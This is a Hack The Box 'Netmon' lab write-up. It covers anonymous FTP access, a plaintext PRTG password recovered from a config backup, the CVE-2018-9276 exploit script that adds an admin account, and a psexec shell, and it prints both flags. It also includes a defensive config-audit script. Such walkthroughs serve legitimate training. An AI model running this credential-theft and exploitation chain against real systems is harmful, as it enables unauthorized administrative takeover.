Netmon - Easy

OSCP Prep Box

Introduction@Netmon:~$

Name: Netmon
IP: 10.10.10.152
OS: Windows
Points: 20
Difficulty: Easy
Creator:
Release Date: 02 March 2019

Enumeration

Nmap

# Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.35s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-23T09:37:47
|_  start_date: 2021-12-23T09:36:30
|_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 seconds

FTP allows anonymous login:

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:sheinn101): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
12-23-21  05:20AM       <DIR>          Windows
226 Transfer complete.
ftp>

It looks like the FTP root directory is C:\.

Getting user.txt

ftp> cd users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
12-23-21  05:13AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-23-21  05:18AM                   94 tester.txt
12-23-21  04:37AM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
34 bytes received in 0.33 secs (0.0999 kB/s)
ftp> exit
221 Goodbye.
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ cat user.txt 
f876bb779c4439a08f27e9b0404e6fb5

So the user flag can be obtained with anonymous FTP alone.

Web

The site is a PRTG Network Monitor (NETMON) login page, so the first thing to try is the default credential prtgadmin:prtgadmin. It doesn't work here, so we go back to the FTP share to look for the credentials.

After poking around, the PRTG configuration files turn up in \ProgramData\Paessler\PRTG Network Monitor.

ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
12-23-21  04:36AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-23-21  04:36AM       <DIR>          Logs (Web Server)
12-23-21  04:42AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-23-21  05:18AM              1671248 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"

Inside the downloaded backup, the password is stored in plain text:

<dbpassword>
	<!-- User: prtgadmin -->
	PrTg@dmin2018
</dbpassword>

Let's try these credentials on the login page.

They don't work either. Looking at the password structure again, PrTg@dmin2018 ends in a year, and the file it came from is an old backup, so the year has probably been rotated since. I tried PrTg@dmin2019 and it worked.
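As an added defensive check that is not part of the original write-up, the Python below audits a PRTG configuration backup like the one pulled from FTP: it reports every plaintext password element, recovers the account name from the inline User: comment, and flags year-suffixed values whose rotation pattern an old backup gives away. The sample configuration is constructed, and matching any tag whose name contains "password" is an assumption.

```python
"""Audit a PRTG configuration backup for plaintext credentials.
Added example, not code from the original post or from Paessler. Only the
<dbpassword> element and its "User:" comment come from the page; matching
any tag whose name contains "password" is an assumption."""
import re
import xml.etree.ElementTree as ET

# Constructed sample shaped like the fragment recovered from the FTP share.
SAMPLE_CONFIG = """<data>
  <dbcredentials>
    <dbpassword>
\t<!-- User: prtgadmin -->
\tPrTg@dmin2018
    </dbpassword>
    <dbuser>prtgadmin</dbuser>
  </dbcredentials>
</data>
"""
USER_HINT = re.compile(r"User:\s*(\S+)")
YEAR_SUFFIX = re.compile(r"(?:19|20)\d{2}$")  # e.g. "...2018": year rotation

def element_text(elem):
    """Element text including text that follows any inline comments."""
    parts = [elem.text or ""]
    parts.extend(child.tail or "" for child in elem)
    return "".join(parts).strip()

def find_plaintext_credentials(xml_text):
    """One finding per non-empty *password* element; comments are kept so the
    'User:' hint written next to the value can be reported with it."""
    parser = ET.XMLParser(target=ET.TreeBuilder(insert_comments=True))
    root = ET.fromstring(xml_text, parser=parser)
    findings = []
    for elem in root.iter():
        # Comment nodes have a non-string tag; skip them and unrelated tags.
        if not isinstance(elem.tag, str) or "password" not in elem.tag.lower():
            continue
        value = element_text(elem)
        if not value:
            continue
        user = None
        for child in elem:
            if child.tag is ET.Comment:
                hit = USER_HINT.search(child.text or "")
                user = hit.group(1) if hit else user
        year = YEAR_SUFFIX.search(value)
        findings.append({"tag": elem.tag, "user": user, "value": value,
                         "year_suffix": year.group(0) if year else None})
    return findings
```

Run it over any PRTG Configuration*.dat or .bak that is reachable from an untrusted share; a non-empty result means the backup must be removed from that location and the credential rotated to something that does not follow the old pattern.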

Getting Administrator

The PRTG version is shown at the bottom left of the page, so the next step is to search for a public exploit for that version.

We will use this Exploit-DB bash script:

https://www.exploit-db.com/exploits/46527

Executing the script may give an error like this:

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 
-bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$

The script has Windows (CRLF) line endings, so the shebang is read as /bin/bash^M. Strip the carriage returns to fix it:

sed -i -e 's/\r$//' 46527.sh

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

The script needs an authenticated session cookie, which we capture with Burp:

./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D"

The script created a new user pentest with password P3nT3st! in the administrators group. Log in with psexec.py:

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file xHANHcvF.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service KSTQ on 10.10.10.152.....
[*] Starting service KSTQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 0EF5-E5E5

 Directory of c:\Users\Administrator\Desktop

02/02/2019  11:35 PM    <DIR>          .
02/02/2019  11:35 PM    <DIR>          ..
12/23/2021  04:37 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,758,518,784 bytes free

c:\Users\Administrator\Desktop>type root.txt
52a75d9617892bb0d16e610dbf2e8787

https://app.hackthebox.com/profile/237587

Resources

https://www.exploit-db.com/exploits/46527

https://www.codewatch.org/blog/?p=453
